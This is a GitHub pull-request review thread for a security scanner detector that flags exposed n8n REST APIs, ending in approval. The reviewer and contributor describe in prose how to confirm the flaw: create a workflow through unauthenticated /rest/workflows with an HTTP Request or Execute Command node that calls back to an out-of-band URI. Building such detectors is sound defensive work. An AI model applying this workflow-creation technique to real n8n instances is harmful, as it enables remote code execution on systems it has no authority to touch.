Conversation
robert-doyensec
left a comment
robert-doyensec
left a comment
There was a problem hiding this comment.
Thank you for the updates. A few suggestions to help debugging later. Is there any way a workflow could be created that executes code to be 100% sure that it is vulnerable? Let me know what you think related to that. There's a strong preference for using an RCE payload that sends an out of bound callback request using the T_CBS_URI variable if possible.
| "Ensure authentication is properly enforced for the n8n instance and that it " | ||
| "is not exposed to untrusted networks. Verify that REST API endpoints are " | ||
| "protected, especially in older or partially initialized deployments. Refer " | ||
| "to https://docs.n8n.io/hosting/securing/overview/ for guidance." |
There was a problem hiding this comment.
I think part of the recommendation should be to upgrade the n8n version since this only detects older versions
templated/templateddetector/plugins/exposedui/N8N_ExposedRestApi.textproto
Show resolved
Hide resolved
templated/templateddetector/plugins/exposedui/N8N_ExposedRestApi.textproto
Show resolved
Hide resolved
|
@robert-doyensec, thanks for update. Yes — that’s possible, but it will looks like another detector. If unauthenticated access to /rest/workflows is available, a workflow can be created (or imported from a file definition) that includes an HTTP Request node (or Execute Command node, if enabled) pointing to {{T_CBS_URI}}. Triggering the workflow will result in an outbound request, providing a reliable OOB signal. There may be some minor adjustments required depending on the n8n version (e.g., differences in REST paths or execution/activation flows across earlier and later 0.x releases). |
…pi.textproto Co-authored-by: Robert Dick <robert@doyensec.com>
…pi.textproto Co-authored-by: Robert Dick <robert@doyensec.com>
|
LGTM - Approved Reviewer: Robert, Doyensec
|
2 participants
Detector for exposed n8n's REST API.
Testbed at google/security-testbeds#199